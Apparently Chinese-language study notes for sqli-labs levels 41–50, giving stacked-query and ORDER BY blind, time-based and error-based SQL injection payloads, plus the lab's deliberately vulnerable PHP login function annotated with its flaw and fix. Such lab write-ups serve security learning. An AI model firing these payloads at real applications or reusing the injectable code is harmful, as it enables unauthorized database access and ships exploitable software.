41
payload:?id=1%20;%20create%20table%20test41%20like%20users;--+
42
步骤
手动
/**
 * Login check used by the stacked-query lessons (sqli-labs 42-45 style).
 *
 * Connects to MySQL, builds the login SELECT from $_POST and runs it through
 * mysqli_multi_query(). Returns column index 1 of the first matching row
 * (presumably the username -- the column order of `users` is not visible
 * here), 0 when that column is falsy, and NULL (implicit) on every other path.
 *
 * Security -- this is the lesson's injection point, documented rather than fixed:
 *   - login_user goes through mysqli_real_escape_string(), so the username
 *     position is not injectable.
 *   - login_password is interpolated raw, so a single quote breaks out of the
 *     literal; because the statement is executed with mysqli_multi_query(),
 *     a ';' lets the caller append arbitrary extra statements (stacked queries).
 *     Only the first result set is ever read, so the appended statement's
 *     output is never shown -- its effect has to be observed out of band
 *     (a created table, a time delay, ...).
 *   - mysqli_error() is echoed verbatim on failure, which also makes
 *     error-based extraction possible.
 * The fix would be a prepared statement (mysqli_prepare + bind_param) executed
 * with mysqli_query() instead of mysqli_multi_query().
 *
 * @param string $host   MySQL host
 * @param string $dbuser MySQL user
 * @param string $dbpass MySQL password
 * @param string $dbname database to select
 * @return mixed column 1 of the matched row, 0, or NULL
 */
function sqllogin($host,$dbuser,$dbpass, $dbname){
// connectivity
//mysql connections for stacked query examples.
$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
// username IS escaped -> not injectable through this parameter.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
// password is NOT escaped -> the injection sink (see docblock).
$password = $_POST["login_password"];
// Check connection
// NOTE(review): mysqli_connect_errno() takes no arguments. With the extra
// argument PHP 7 emits a warning and the call yields NULL (branch never
// taken); PHP 8 throws ArgumentCountError. Either way this is not the check
// it looks like -- confirm on the target PHP version.
if (mysqli_connect_errno($con1))
{
// Only echoes; execution falls through and the query below still runs
// against the failed handle.
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
else
{
// '@' hides the select_db error; die() is the only hard stop in this function.
@mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");
}
/* execute multi query */
// String-built SQL with the raw password: a quote closes the literal and a
// ';' starts a new statement that multi_query will execute.
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql))
{
/* store first result set */
// Only the first result set is consumed; there is no mysqli_next_result(),
// so whatever a stacked statement returns is discarded.
if($result = @mysqli_store_result($con1))
{
if($row = @mysqli_fetch_row($result))
{
// Column index 1 is handed back as the "logged in" identity when truthy.
if ($row[1])
{
return $row[1];
}
else
{
return 0;
}
}
// No row fetched: falls through and returns NULL.
}
else
{
// Database error text is printed verbatim to the page (error disclosure).
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else
{
// Query failed: same verbatim error disclosure.
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
username 经过 mysqli_real_escape_string 转义，password 则直接从 $_POST 拼进 SQL、未做任何过滤；又因为查询是用 mysqli_multi_query 执行的，可以用 `;` 追加额外语句，所以存在堆叠注入。注意代码只读取第一个结果集（没有调用 mysqli_next_result），堆叠语句的执行结果不会回显，只能通过副作用（如新建表、延时）来确认。payload 放在 POST 体中时 `#` 可直接使用，若放在 URL 中需写成 %23（见第 50 题）。
payload:login_user=1&login_password=1'; create table test42 like users #&mysubmit=Login
43
payload:login_user=1&login_password=1'); create table test43 like users #&mysubmit=Login
44
payload:login_user=1&login_password=1'; create table test44 like users #&mysubmit=Login
45
payload:login_user=1&login_password=1'); create table test45 like users #&mysubmit=Login
46
步骤
手动
参数直接拼进 ORDER BY 子句，输入内容未做任何过滤。ORDER BY 中的列名/表达式无法用预编译参数绑定，这类位置只能靠白名单校验来防御；由于 ORDER BY 位置不能直接用 UNION 回显，只能通过布尔、时间或报错方式把数据带出来。
1.布尔盲注
?order=if(1=1,username,password)
?order=null,if(1=1,username,password)
?order=(case when (1=1) then username else password end)
?order=ifnull(null, username)
?order=rand(1=1) //rand(1=1) 等价于 rand(1) 或 rand(0)，两个种子得到的行序不同，据此判断条件真假
?order=(select 1 regexp if(1=1,1,0x00))
2.时间盲注，例如 ?order=if(1=1,sleep(1),1)（ORDER BY 表达式对每一行都会求值，延时随行数成倍增加，sleep 的秒数要取小一点）
3.报错注入，例如 ?order=updatexml(1,concat(0x7e,database()),1)（前提是页面会把数据库报错回显出来）
sqlmap
47
同46加个'
48
盲注,使用46题方法即可。
49
同48加个'
50
堆叠注入
payload:1;create table test50 like users;%23